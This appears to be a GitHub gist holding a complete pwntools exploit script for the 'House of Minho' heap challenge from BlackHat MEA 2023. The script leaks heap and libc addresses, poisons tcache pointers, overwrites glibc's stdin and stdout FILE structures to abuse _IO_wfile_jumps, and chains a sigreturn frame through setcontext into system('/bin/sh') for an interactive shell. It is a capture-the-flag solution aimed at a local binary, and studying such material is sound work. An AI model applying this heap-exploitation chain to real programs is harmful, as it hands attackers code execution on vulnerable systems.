@kungfulon
Created November 16, 2023 06:03
BlackHat MEA 2023 - House of Minho
from pwn import *
# Process/ELF setup.  The target is spawned locally (no remote host), and the
# libc handle is the host's own system libc, so the raw offsets used later in
# the script are presumably tied to that one build.
context.update(arch='amd64', os='linux')
r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def new(size, data, abuse_scanf=0):
    """Select menu choice 1 on the module-level tube ``r``, then send *size* and *data*.

    ``abuse_scanf`` ASCII ``'0'`` characters are prepended to the size line;
    the decimal value is unchanged, only the line gets longer (what the target
    does with that extra input is not visible here).  *data* is sent with
    ``sendafter``, i.e. without a trailing newline.
    """
    size_line = b'0' * abuse_scanf + f'{size}'.encode()
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b': ', size_line)
    r.sendafter(b': ', data)
def show():
    """Select menu choice 2 on the module-level tube ``r``; any output is left for the caller to read."""
    choice = b'2'
    r.sendlineafter(b'> ', choice)
def delete(abuse_scanf=0):
    """Select menu choice 3 on the module-level tube ``r``.

    The choice is left-padded with ``abuse_scanf`` ASCII ``'0'`` characters
    (``b'3'`` becomes e.g. ``b'0003'``), which lengthens the line without
    changing its numeric value.
    """
    choice = b'3'.rjust(abuse_scanf + 1, b'0')
    r.sendlineafter(b'> ', choice)
def tcache(target, chunk):
    """Return ``target ^ (chunk >> 12)`` packed as 8 little-endian bytes.

    ``>>`` binds tighter than ``^`` in the original one-liner; the
    parentheses here only make that precedence explicit.
    """
    shifted = chunk >> 12
    return p64(target ^ shifted)
# Solve script for the BlackHat MEA 2023 "House of Minho" pwn challenge (gist
# title).  It only drives the local process started above, and every numeric
# constant in it (heap deltas such as 0x12c0, libc offsets such as 0x219ce0,
# 0x219d60, 0x21ba70, 0x1d8698, setcontext + 294) is hard-coded for the
# challenge binary and the one libc build it was written against; none of
# them is derived at runtime, so the script is not portable across builds.
new(1, b'A')
delete()
new(2, b'A')
delete()
new(1, b'A', 0x558)
delete()
# Seven new()/delete() rounds each; the size line is padded with a decreasing
# count of leading zeros (0x52e down to 0x528, then 0x4fe down to 0x4f8).
for i in range(0x52e, 0x527, -1):
    new(1, b'A', i)
    delete()
for i in range(0x4fe, 0x4f7, -1):
    new(1, b'A', i)
    delete()
new(1, b'A' * 0x50)
show()
r.recvuntil(b': ')
r.recvn(0x50)
# Five leaked bytes are zero-extended to eight before u64(); the << 12 and the
# -0x1000 adjustment assume a fixed distance between the leaked value and the
# value used as `heap` below (page-specific, not verifiable here).
heap = (u64(r.recvn(5) + b'\x00\x00\x00') << 12) - 0x1000
log.info('heap = 0x%x', heap)
delete()
new(1, p64(0x0) * 3 + p64(0x31) + p64(heap + 0x12c0) * 2 + b'A' * 0x10 + p64(0x30) + p64(0x590))
delete()
new(2, b'A' * 0x50 + p64(0x90) + p64(0x30))
delete()
new(1, b'A' * 0x20)
show()
r.recvuntil(b': ')
r.recvn(0x20)
# Six leaked bytes zero-extended to eight; 0x219ce0 is a raw offset into this
# particular libc build, so `l.address` is only meaningful for that build.
l.address = u64(r.recvn(6) + b'\x00\x00') - 0x219ce0
log.info('libc = 0x%x', l.address)
delete()
new(1, b'A' * 0x18 + p64(0x91))
delete()
delete(0x400)
new(1, b'\x00' * 0x18 + p64(0x91) + p64(l.address + 0x219d60) + p64(heap + 0x12d0) + p64(heap + 0x12c0) + p64(l.address + 0x219d60))
delete()
new(2, b'A')
delete()
new(1, b'\x00' * 0x18 + p64(0x81) + tcache(l.symbols['_IO_2_1_stdin_'], heap + 0x12c0))
delete()
new(2, b'\x00')
delete()
# pwntools FileStructure: the first instance is used only for its read()
# helper; the second is filled in field by field and serialised with bytes().
f = FileStructure()
new(2, f.read(l.symbols['_IO_2_1_stdout_'], 0x1000))
f = FileStructure()
f._IO_write_ptr = 0x1
f._lock = l.address + 0x21ba70
f._wide_data = l.symbols['_IO_2_1_stdout_'] + len(f)
f.vtable = l.symbols['_IO_wfile_jumps']
# pwntools SigreturnFrame, fields set by name; it is appended to the
# serialised file structure and both are sent in a single write below.
s = SigreturnFrame()
s['rip'] = l.symbols['system']
s['rdi'] = l.address + 0x1d8698 # /bin/sh
s['rbp'] = l.symbols['setcontext'] + 294
s['&fpstate'] = l.symbols['_IO_2_1_stdout_'] + len(f) + 0x10
r.sendafter(b'> ', bytes(f) + bytes(s))
r.interactive()